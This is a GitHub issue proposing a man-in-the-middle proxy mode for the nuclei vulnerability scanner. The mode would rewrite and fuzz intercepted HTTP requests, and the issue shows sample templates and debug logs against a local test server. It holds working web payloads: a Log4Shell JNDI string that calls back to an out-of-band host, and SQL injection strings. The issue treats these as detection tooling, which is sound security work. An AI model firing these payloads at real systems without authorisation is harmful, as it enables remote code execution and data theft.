### ISSUE TITLE
nuclei adds mitm(middle attack mode)

### ISSUE THREAD

**Issue by capiton0** [projectdiscovery/nuclei#2569]
### Please describe your feature request

nuclei becomes a proxy server and automatically parses incoming requests.
Afterwards, active scanning is performed according to the nuclei-template.

Like burpsuite's live audit or xray's passive proxy scan

### Describe the use case for this feature
Start listening to the local port to run as a proxy server
```
$ nuclei -tags cve -listen 127.0.0.1:7777 

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   2.7.7

		projectdiscovery.io

[WRN] Use with caution. You are responsible for your actions.
[WRN] Developers assume no liability and are not responsible for any misuse or damage.
[INF] Using Nuclei Engine 2.7.7 (latest)
[INF] Using Nuclei Templates 9.1.8 (latest)
[INF] Templates added in last update: 50
[INF] Templates loaded for scan: 1410
[INF] Loading cert from ca.crt and ca.key
[INF] Starting mitm server at 127.0.0.1:7777
```
(ca.crt /ca.key user to handle https requests)

Send to nuclei proxy server using curl or browser, burpsuite

```
$ curl http://test.com -x http://127.0.0.1:7777
$ curl  -X POST -d 'id=1'  http://test.com/search -x http://127.0.0.1:7777
```

```
$ nuclei -tags cve -listen 127.0.0.1:7777 

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   2.7.7

		projectdiscovery.io

[WRN] Use with caution. You are responsible for your actions.
[WRN] Developers assume no liability and are not responsible for any misuse or damage.
[INF] Using Nuclei Engine 2.7.7 (latest)
[INF] Using Nuclei Templates 9.1.8 (latest)
[INF] Templates added in last update: 50
[INF] Templates loaded for scan: 1410
[INF] Loading cert from ca.crt and ca.key
[INF] Starting mitm server at 127.0.0.1:7777
[INF] processing GET http://test.com/
[INF] processing POST http://test.com/search
[0:00:10] | Templates: 1410 | Hosts: 2 | RPS: 5 | Matched: 0 | Errors: 0 | Pending: 1000 |Requests: 992/2820 (30%)
```
Pending:
In the above example, 1410 cve templates were introduced
The proxy server receives one request and sends 1410 additional new requests
So Pending is introduced, the maximum number of requests to be processed in memory

---
After adding mitm mode, you can introduce a configuration file to fuzz test the incoming requests

A configuration file like this:
```

mitm:
  - fuzz:
    payload:
      - 11
    
    type: replace 
      # replace (default) - replaces the value of parameter with payload
      # prefix - append the payload to existing parameter value
      # postfix - prepend the payload to existing parameter value
      # infix - place the payload in between the existing parameter value
    
    part:
      # Parameter insertion is divided into two categories
      # 1. According to the request parameter type
      # 2. According to the location of the request package
      
      #1. According to the request parameter type
      param:
        name:
          - body  # in the body like id=1 -> {{payload}}=1
          - url   # in the url like http://test.com/?id=1 -> http://test.com/?{{payload}}=1
          - cookie # in the cookie like session=13d3328f74a729ab8c8b4c92499981c6; -> {{payload}}=13d3328f74a729ab8c8b4c92499981c6
          - body_json #in the body like {"id":"1"} -> { "{{payload}}":"1" }
          - body_xml  #To be determined 
          - body_mutipart #To be determined
        value:
          - body  # in the body like id=1 -> id={{payload}}
          - url   # in the url like http://test.com/?id=1 -> http://test.com/?id={{payload}}
          - cookie # in the cookie like session=13d3328f74a729ab8c8b4c92499981c6; -> session={{payload}};
          - body_json #in the body like {"id":"1"} -> { "id":"{{payload}}" }
          - body_xml  #To be determined 
          - body_mutipart #To be determined

      #2. According to the location of the request package
      url:
        - path  #in the url like http://test.com/abc -> http://test.com/{{payload}}
        - folder #in the url like http://test.com/abc/ -> http://test.com/{{payload}}
        - filename  #in the url like http://test.com/abc.txt -> http://test.com/{{payload}}
        - all # Check all of the above

      header:
        headername: #in the url like Referer: https://test.com/-> Referer: {{payload}}
          - Host
          - Accept
          - Accept-Encoding
          - Origin
          - User Agent
          - Accept-Language
          - Content-Type
          - Referer
        cookie:
          - name # in the cookie like session=13d3328f74a729ab8c8b4c92499981c6; -> {{payload}}=13d3328f74a729ab8c8b4c92499981c6;
          - value # in the cookie like session=13d3328f74a729ab8c8b4c92499981c6; -> session={{payload}};

      body:
        - entire  # In body when body is empty Add {{payload}}
        - xml #To be determined
        - json  #To be determined
        - mutipart #To be determined
        - all # Check all of the above
```

Here is a minimal sample template for log4j parameter fuzzing tests:

```
id: CVE-2021-44228-fuzzing

info:
  name: Apache Log4j2 Remote Code Injection-fuzzing
  author: capiton
  severity: critical

mitm:
  - fuzz:
    payload:
      - "${jndi:ldap://${hostName}.{{interactsh-url}}/a}"
    type: replace 

    part:
      param:
        value:
          - body  
          - url  
          - cookie
      header:
        headername: #in the url like Referer: https://test.com/-> Referer: {{payload}}
          - Origin
          - Referer

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol  # Confirms the DNS Interaction
        words:
          - "dns"

      - type: regex
        part: interactsh_request
        regex:
          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'   

    extractors:
      - type: regex
        part: interactsh_request
        group: 2
        regex:
          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'  

      - type: regex
        part: interactsh_request
        group: 1
        regex:
          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'  
```
nuclei turns on listening
```
$ nuclei -t CVE-2021-44228-fuzzing.yaml -listen 127.0.0.1:7777 

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   2.7.7

		projectdiscovery.io

[WRN] Use with caution. You are responsible for your actions.
[WRN] Developers assume no liability and are not responsible for any misuse or damage.
[INF] Using Nuclei Engine 2.7.7 (latest)
[INF] Using Nuclei Templates 9.1.8 (latest)
[INF] Templates added in last update: 50
[INF] Templates loaded for scan: 1410
[INF] Loading cert from ca.crt and ca.key
[INF] Starting mitm server at 127.0.0.1:7777
```

Send the request to the nuclei proxy server
```
$ curl  -X POST -d 'id=1'  http://127.0.0.1:8000/search -x http://127.0.0.1:7777
```

Turn on debug mode to view requests
```
$ nuclei -t CVE-2021-44228-fuzzing.yaml -listen 127.0.0.1:7777 -debug
                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   2.7.7

		projectdiscovery.io

[INF] Using Interactsh Server: oast.pro
[CVE-2021-44228-fuzzing] Apache Log4j2 Remote Code Injection-fuzzing(@capiton) [critical]
[INF] [CVE-2021-44228-fuzzing] Dumped HTTP request for http://127.0.0.1:8000/search

POST /search HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

id=${jndi:ldap://${hostName}.ccbdbl76i1e31cpo0u10xok55pqpbdm73.oast.pro/a}

[INF] [CVE-2021-44228-fuzzing] Dumped HTTP request for http://127.0.0.1:8000/search

POST /search HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
Origin: ${jndi:ldap://${hostName}.ccbdbl76i1e31cpo0u10xok55pqpbdm73.oast.pro/a}

id=1

[INF] [CVE-2021-44228-fuzzing] Dumped HTTP request for http://127.0.0.1:8000/search

POST /search HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
Referer: ${jndi:ldap://${hostName}.ccbdbl76i1e31cpo0u10xok55pqpbdm73.oast.pro/a}

id=1

```

---
Here is a minimal sample template for sqli parameter fuzzing tests:
```
id: sqli-fuzzing

info:
  name: sqli-fuzzing
  author: capiton
  severity: high

mitm:
  - fuzz:
    payload:
      - "or 1=1"
      - "or 1=1--"
      - "\""
      - "'"

    type: prefix 
    part:
      param:
        value:
          - body 
          - url  
          - cookie 


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - Microsoft OLE DB Provider for ODBC Drivers error
          - You have an error in your SQL syntax
          - "ORA-00933: SQL command not properly ended"
          - SQL syntax error
        condition: or 
```
nuclei turns on listening
```
$ nuclei -t sqli-fuzzing.yaml -listen 127.0.0.1:7777 

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   2.7.7

		projectdiscovery.io

[WRN] Use with caution. You are responsible for your actions.
[WRN] Developers assume no liability and are not responsible for any misuse or damage.
[INF] Using Nuclei Engine 2.7.7 (latest)
[INF] Using Nuclei Templates 9.1.8 (latest)
[INF] Templates added in last update: 50
[INF] Templates loaded for scan: 1410
[INF] Loading cert from ca.crt and ca.key
[INF] Starting mitm server at 127.0.0.1:7777
```

Send the request to the nuclei proxy server
```
$ curl  -X POST -d 'id=1'  http://127.0.0.1:8000/index.php?search=1 -x http://127.0.0.1:7777
```

Turn on debug mode to view requests
```
$ nuclei -t sqli-fuzzing.yaml -listen 127.0.0.1:7777 -debug
                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   2.7.7

		projectdiscovery.io

[sqli-fuzzing] sqli-fuzzing(@capiton) [high]
[INF] [sqli-fuzzing] Dumped HTTP request for http://127.0.0.1:8000/search

POST /index.php?search=1 HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

id=1 or 1=1

[INF] [sqli-fuzzing] Dumped HTTP request for http://127.0.0.1:8000/search

POST /index.php?search=1 HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

id=1 or 1=1--

[INF] [sqli-fuzzing] Dumped HTTP request for http://127.0.0.1:8000/search

POST /index.php?search=1 or 1=1 HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

id=1

[INF] [sqli-fuzzing] Dumped HTTP request for http://127.0.0.1:8000/search

POST /index.php?search=1 or 1=1-- HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

id=1
```
